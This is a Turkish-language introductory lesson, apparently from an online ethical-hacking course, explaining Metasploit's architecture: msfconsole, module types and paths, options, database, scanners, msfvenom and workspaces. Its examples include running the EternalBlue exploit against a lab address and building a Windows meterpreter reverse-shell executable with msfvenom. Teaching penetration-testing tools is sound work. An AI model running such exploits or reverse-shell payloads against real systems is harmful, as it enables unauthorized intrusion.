Metasploit Mimarisi
Modüller ve konsol
Metasploit Mimarisi, CoddyKit'te ücretsiz bir Ethical Hacking Academy dersidir. Bu, 4 dersinin 1. dersidir. Aşağıdan dersin tamamını ücretsiz okuyabilir, sonra tarayıcıda yerleşik kod editörü ve 7/24 yapay zeka koçu ile uygulamalı olarak pratik yapabilirsin. Bu, Ethical Hacking Academy öğrenme yolunun bir parçasıdır ve ilerlemeniz web ve CoddyKit uygulaması arasında senkronize olur. Ethical Hacking Academy kursu toplamda 4 dersten oluşur.
Metasploit Nedir
Metasploit, en yaygın kullanılan istismar çerçevesidir. Yetkili çalışmalar sırasında güvenlik açıklarını test etmek ve göstermek için yapılandırılmış bir istismar, yük ve araç kütüphanesi sunar.
Her saldırıyı sıfırdan yazmak yerine, kanıtlanmış modülleri yükler, yapılandırır ve bunları tutarlı bir arayüz üzerinden çalıştırırsınız.
msfconsole
Birincil arayüz, etkileşimli bir komut satırı kabuğu olan msfconsole'dur. Sekme ile tamamlama, komut geçmişi ve her modüle erişim sunar.
Programı bir terminalden başlatır ve ardından tamamen istemi içinde çalışırsınız.
msfconsole
# msf6 > helpModül Türleri
Metasploit, yetenekleri modül türleri hâlinde düzenler:
- exploit: bir güvenlik açığından yararlanan kod.
- payload: istismardan sonra hedefte çalışan kod.
- auxiliary: yük göndermeyen tarayıcılar, bulanıklaştırıcılar ve araçlar.
- post: ele geçirilmiş bir ana bilgisayardaki istismar sonrası eylemler.
- encoder ve nop: yüklerin tespit edilmekten kaçınmasına yardımcı olur.
Modül Adlandırma
Modüller, ne yaptıklarını tam olarak belirten hiyerarşik bir yol kullanır. Yolu okumak türü, platformu ve hedef hizmeti ortaya çıkarır.
exploit/windows/smb/ms17_010_eternalblue
# type / platform / service / specific exploitİstismarlar ve Yükler
Önemli bir ayrım:
- exploit, içeri girme yoludur; savunmasız yazılımı bozar.
- payload, içeri girdikten sonra olmasını istediğiniz şeydir; örneğin bir kabuk açmak.
Bunları eşleştirirsiniz: bir istismar, amacınıza ve hedefe bağlı olarak birçok farklı yük gönderebilir.
Modül İş Akışı
Herhangi bir modülle çalışmak tekrarlanabilir bir döngüyü izler:
- Bir modül için search kullanın.
- Yüklemek için use kullanın.
- RHOSTS ve LHOST gibi options değerlerini ayarlayın.
- run veya exploit komutunu çalıştırın.
Çerçevenin binlerce modül arasında ölçeklenebilmesinin nedeni bu tutarlılıktır.
use exploit/windows/smb/ms17_010_eternalblue
show options
set RHOSTS 10.10.10.5
exploitVeri Deposu ve Seçenekler
Modül ayarları datastore içinde bulunur. Her seçenek gerekli veya isteğe bağlı olabilir.
- RHOSTS: uzak hedef adres(ler)i.
- RPORT: uzak bağlantı noktası.
- LHOST: ters bağlantılar için dinleme adresiniz.
- LPORT: dinleme bağlantı noktanız.
Çalıştırmadan önce bir modülün neye ihtiyaç duyduğunu görmek için show options komutunu kullanın.
Veritabanı
Metasploit, bir çalışma sırasında keşfedilen ana bilgisayarları, hizmetleri, ganimetleri ve kimlik bilgilerini depolamak için PostgreSQL veritabanı ile bütünleşir. Bu, geniş bir kapsamı verimli biçimde izlemenizi sağlar.
Sonuçların otomatik olarak kaydedilmesi için konsolu başlatmadan önce veritabanını çalıştırın.
msfdb init
# Inside msfconsole:
# db_status hosts services credsYardımcı Modüller
Auxiliary modülleri istismar gerçekleştirmeden yararlı işler yapar: bağlantı noktası tarama, hizmet numaralandırma, oturum açma için kaba kuvvet denemeleri ve bulanıklaştırma.
İhtiyacınız olan bilgileri toplayarak bir istismar seçmeden önce çoğu zaman ilk adımınız olurlar.
use auxiliary/scanner/smb/smb_version
set RHOSTS 10.10.10.0/24
runmsfvenom
msfvenom, bağımsız yükleri dosya olarak oluşturmak için kullanılan yardımcı bir araçtır: konsol dışında göndereceğiniz çalıştırılabilir dosyalar, betikler veya kabuk kodu.
Yük oluşturma ve kodlamayı tek bir komutta birleştirir; kimlik avı benzetimleri veya yetkili testlerde özel gönderim için kullanışlıdır.
msfvenom -p windows/meterpreter/reverse_tcp \
LHOST=10.10.14.2 LPORT=4444 -f exe -o shell.exeÇalışma Alanları
Birden çok çalışma için Metasploit çalışma alanları, her müşterinin ana bilgisayarlarını, hizmetlerini ve ganimetlerini veritabanında ayrı tutar. Verilerin değerlendirmeler arasında karışmaması için bunlar arasında geçiş yaparsınız.
workspace -a clientA # add a workspace
workspace clientA # switch to it
workspace # list allHızlı Kontrol
Modül türlerini ne kadar kavradığınızı test edin.
Özet
Metasploit'in mimarisi hakkında şunları öğrendiniz:
- msfconsole ana arayüzdür; msfvenom bağımsız yükler oluşturur.
- Modül türleri: exploit, payload, auxiliary, post, encoder/nop.
- Modül yolları türü/platformu/hizmeti kodlar.
- İş akışı: search, use, set options, run; ayarlar datastore içinde bulunur.
- PostgreSQL veritabanı, ana bilgisayarları, hizmetleri ve ganimetleri izler.
Sırada: istismarları etkili biçimde arama ve kullanma.
Sıkça Sorulan Sorular
“Metasploit Mimarisi” dersi ücretsiz mi?
Evet — “Metasploit Mimarisi” dersin tüm metni burada web'de ücretsiz olarak okunabilir. Etkileşimli olarak pratik yapmak (yerleşik kod editörü ve 7/24 yapay zeka koçu) ve Ethical Hacking Academy kursunun geri kalanını açmak için CoddyKit PRO'ya yükselt. Ethical Hacking Academy kursu toplamda 4 dersten oluşur.
“Metasploit Mimarisi” dersinde ne öğreneceğim?
Modüller ve konsol Ethical Hacking Academy ile uygulamalı kodu tarayıcıda doğrudan çalıştırarak pratik yaparsın ve 7/24 yapay zeka koçu dersi çalışırken sorularını yanıtlar.
Ethical Hacking Academy öğrenmeye başlamak için deneyim gerekli mi?
Önceden deneyim gerekmez. CoddyKit'te Ethical Hacking Academy, başlangıçtan ileri seviyeye kadar yapılandırıldığı için buradan başlayabilir veya başından başlayıp kendi hızında ilerleme yapabilirsin. Bu, 4 dersinin 1. dersidir.
“Metasploit Mimarisi” dersi ne kadar sürer?
Çoğu CoddyKit dersi yaklaşık 5–10 dakika sürer. Her biri kısa ve etkileşimli olduğu için sabit ilerleme yaparsın ve web ile uygulama arasında tam olarak bıraktığın yerden devam edebilirsin.
Bu Ethical Hacking Academy dersinde kod yazıp çalıştırabilir miyim?
Evet. Her Ethical Hacking Academy dersi yerleşik bir kod editörü içerir, bu sayede tarayıcıda gerçek kod yazıp çalıştırabilir ve anlık yapay zeka geri bildirimi alırsın — yerel kurulum gerekli değildir.
Bu kursun tüm dersleri
- Metasploit Mimarisi
- İstismarları Arama ve Kullanma
- Yükler ve Meterpreter
- İstismar Sonrası Modüller